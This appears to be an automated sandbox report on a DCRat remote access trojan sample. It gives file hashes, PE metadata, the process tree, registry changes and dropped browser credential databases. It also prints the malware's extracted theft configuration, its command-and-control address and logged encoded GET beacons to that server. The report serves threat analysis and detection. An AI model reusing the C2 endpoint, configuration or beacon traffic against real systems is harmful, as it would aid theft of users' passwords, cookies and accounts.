File name: | 0e4ab826459cb17dd81ac1f62fb2b637.exe |
Full analysis: | https://app.any.run/tasks/8c7511b2-e29f-49f1-9f78-b777f5763a64 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | April 01, 2023, 06:59:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5: | 0E4AB826459CB17DD81AC1F62FB2B637 |
SHA1: | 2550D554733A48383EDB6E8BC0646893C14AF321 |
SHA256: | 5AF923EE6B4D6C39976AAA6AB187A9FA82FB9EA53AAED2486D8FF00A54FC005D |
SSDEEP: | 49152:exnjjGfr0Yw0T1JQS8mG3WxfY3xnr+SrsOsXtPjenjSlYnlGrWJYGPmzKRg3rC6e:IjnYE |
.exe | | | Win64 Executable (generic) (49.4) |
---|---|---|
.scr | | | Windows screen saver (23.4) |
.dll | | | Win32 Dynamic Link Library (generic) (11.7) |
.exe | | | Win32 Executable (generic) (8) |
.exe | | | Generic Win/DOS Executable (3.5) |
AssemblyVersion: | 1.0.0.0 |
---|---|
ProductVersion: | 1.0.0.0 |
ProductName: | - |
OriginalFileName: | Goqcymikjjp.exe |
LegalTrademarks: | - |
LegalCopyright: | - |
InternalName: | Goqcymikjjp.exe |
FileVersion: | 1.0.0.0 |
FileDescription: | - |
CompanyName: | - |
Comments: | - |
CharacterSet: | Unicode |
LanguageCode: | Neutral |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 1.0.0.0 |
FileVersionNumber: | 1.0.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x60bcfe |
UninitializedDataSize: | - |
InitializedDataSize: | 2048 |
CodeSize: | 6331904 |
LinkerVersion: | 8 |
PEType: | PE32 |
ImageFileCharacteristics: | Executable, No line numbers, No symbols, 32-bit |
TimeStamp: | 2023:03:27 16:27:52+00:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 27-Mar-2023 16:27:52 |
Comments: | - |
CompanyName: | - |
FileDescription: | - |
FileVersion: | 1.0.0.0 |
InternalName: | Goqcymikjjp.exe |
LegalCopyright: | - |
LegalTrademarks: | - |
OriginalFilename: | Goqcymikjjp.exe |
ProductName: | - |
ProductVersion: | 1.0.0.0 |
Assembly Version: | 1.0.0.0 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 27-Mar-2023 16:27:52 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00002000 | 0x00609D04 | 0x00609E00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.31895 |
.rsrc | 0x0060C000 | 0x00000570 | 0x00000600 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 3.97523 |
.reloc | 0x0060E000 | 0x0000000C | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 0.0815394 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.00112 | 490 | UNKNOWN | UNKNOWN | RT_MANIFEST |
mscoree.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1600 | "C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe" | C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe | | explorer.exe |
User: admin, Integrity Level: MEDIUM, Exit code: 0, Version: 1.0.0.0
1224 | "C:\Users\admin\AppData\Local\Temp\Rkwuzkqocmsprovider.exe" | C:\Users\admin\AppData\Local\Temp\Rkwuzkqocmsprovider.exe | | 0e4ab826459cb17dd81ac1f62fb2b637.exe |
User: admin, Integrity Level: MEDIUM, Version: 1.1.1o
DcRat (PID 1224) Process: Rkwuzkqocmsprovider.exe. Options: Target: ru, searchpath: %UsersFolder% - Fast, sysinfo: true, clipboard: true, screenshot: true, filezilla: true, discord: true, steam: true, telegram: true, history: true, cc: true, forms: true, passwords: true, cookies: true, ignorepartiallyemptydata: false, savebrowsersdatatosinglefile: false. Mutex: DCR_MUTEX-UmFunEUN2QKTuURlY86u. C2 (1): http://80.66.64.164/@==QeyFmcvBXblRFdwlmcjNXY2Fma
840 | C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe | C:\Users\admin\AppData\Local\Temp\0e4ab826459cb17dd81ac1f62fb2b637.exe | — | 0e4ab826459cb17dd81ac1f62fb2b637.exe |
User: admin, Integrity Level: MEDIUM, Exit code: 0, Version: 1.0.0.0
(PID) Process | Key | Operation | Name | Value |
---|---|---|---|---|
(1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1 |
(1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1 |
(1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1 |
(1600) 0e4ab826459cb17dd81ac1f62fb2b637.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0 |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\KTyh7ancxu | — | — | — |
1600 | 0e4ab826459cb17dd81ac1f62fb2b637.exe | C:\Users\admin\AppData\Local\Temp\Rkwuzkqocmsprovider.exe | executable | ABC063B83C8F79F2958E5EE6AF58EFD9 | D956494A0DD730970C27C092A2940659EB86A3993D53B74ABB931DAA1A21E611 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\ENHSdMymof | text | 5D09B6238D23D8243F326557679DA858 | DE48DE829B1EAA3D72A92BAFDB8B29EBAC7779A14E93C8E17BD6B5E810CE3424 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\cuomYCfzC0 | sqlite | 387B1D63B45DA12EE4D0C68A9E777271 | 40BD4B959B25DBF4D65864B92F548C5373C12FC7EF99FE70A9BE479A90FBF0D2 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\12TNps9g1j | sqlite | 1AA08FF2105515DE3602F503E87DFF1A | D7446E2F307027C9BDA2A92D1DF1C13C376581372F6AE8708F4D5BACCB2E6813 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\jer2eZ2Hqc | sqlite | 0A149D1DB8612AE149B4B3A03204D29F | 6984F4A4A4CBB11E3B6057314EC765D5210521478FF411F883FC5EC2F31D6768 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\Public\nltxvmn2.default\key4.db | sqlite | 2D88BB69E75C2D609BA79F7353DAECC1 | 263ECB9445A828CEC98F7C19B2FF3B4DFAD99EE58C5E394E5F6778FD441415F3 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\TNwvbzqG6P | sqlite | FF3819BA79CA33058AB110FEC5CD0955 | C5140A31EA483E1E6AFE2A2750B853FA46FA3C5B0A04C973094E23E6C8AD533E |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\admin\AppData\Local\Temp\znNJdABXKw | sqlite | C72DB02959D2F97D090B0051EE963AD7 | 6D8285E102CD46A9379778B223651ECEE043321E436DD15C2354EC59F5EB22A5 |
1224 | Rkwuzkqocmsprovider.exe | C:\Users\Public\nltxvmn2.default\cert9.db | sqlite | A365A828387B1BE4FA97C3D66CAA9737 | 0D06053B2562DCC977387B2C3C50BF5465C680844003B9C25C4B5341BE753154 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIhdTY1ATOwETYhF2N1YmY5cTMxITN3ITNzUjZhRWOlN2MxETNmRjY2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | — | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&dd7b03ae6c4e45bd2937ccddc7db3520=0VfiIiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIxE2Y3MWNjNWZ2MjYyUGZyYzYmFzYhBDNkNGMyUWN1QWNjNTZmJzMkJiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | — | — | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?VS=eWUOiNXxrlDJtY&xBEheqJsMcbRTCusqwxybdz8axatB=60rfYx6yxtUnHvH6Ev63&X5kcULGGrQarj=kjyn7v19EexVD0dtp&523cb4a88cd88085e6950574569f4c8e=ae1f010aadf78c1c01fd87c55bda0e34&81b4323d1ba298bdd827e6bc71221f6c=AZiFzN0gjZjVTNzMTY0ImN5gDM5Q2NhdjY2M2M3YTY4czY2EWM5cjM&VS=eWUOiNXxrlDJtY&xBEheqJsMcbRTCusqwxybdz8axatB=60rfYx6yxtUnHvH6Ev63&X5kcULGGrQarj=kjyn7v19EexVD0dtp | TR | text | 2.05 Kb | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&dd7b03ae6c4e45bd2937ccddc7db3520=0VfiIiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIhdTY1ATOwETYhF2N1YmY5cTMxITN3ITNzUjZhRWOlN2MxETNmRjY2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&388bb5cba49bcf24876d6c7eea81bda3=d1nILBTQNJiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIxYTNiNmYkVTOwcjNxMTZjZjZilTYjBTMkFDZmRWNkFmZjBTM0MTN2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&dd7b03ae6c4e45bd2937ccddc7db3520=0VfiIiOiIjYkBjNzkTY5EjZwI2N0QjNlVDO4UDNhZmY0gjMklTZiwiIxYTNiNmYkVTOwcjNxMTZjZjZilTYjBTMkFDZmRWNkFmZjBTM0MTN2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
1224 | Rkwuzkqocmsprovider.exe | GET | 200 | 80.66.64.164:80 | http://80.66.64.164/javascriptTemporary.php?ykkGBQVG=7rrkFmKp4&V3jBXsOjtCFOTxxDhnL=anqGjFZM&3913157c093dad486140eb17bb933205=QZ1Y2N5QGO1IGO2MmN3IGM2UWN0M2N0YzNmBDMzUTOmRTNhVmY3UDZ3cTNxEjM5YzNyATMwIDN&81b4323d1ba298bdd827e6bc71221f6c=gYkFTZ0MDN3QmYkNjMjV2NzATNlJGO2MjM4EzN0MGO3EmZwcjMygTM&ba1f2800a8106931905496eca7a12557=d1nIxYTNiNmYkVTOwcjNxMTZjZjZilTYjBTMkFDZmRWNkFmZjBTM0MTN2IiOicDOiFTNwI2NiVjM0YWNkZjZldjZiJjMwADM3ATN0UTMiwiIxMjY0YWOllDZ5EWMhNTOyQ2NiVGNyEDZyQWZyATOxADNyUGN4EjY0IiOiMjN2UjNmNjZhRTYhFGM3UWOmJTYyYGMiR2MyQmNwYGZis3W | TR | text | 104 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | 80.66.64.164:80 | — | LLC South Internet | TR | malicious |
— | — | 80.66.64.164:80 | — | LLC South Internet | TR | malicious |
PID | Process | Class | Message |
---|---|---|---|
1224 | Rkwuzkqocmsprovider.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |
1224 | Rkwuzkqocmsprovider.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt) |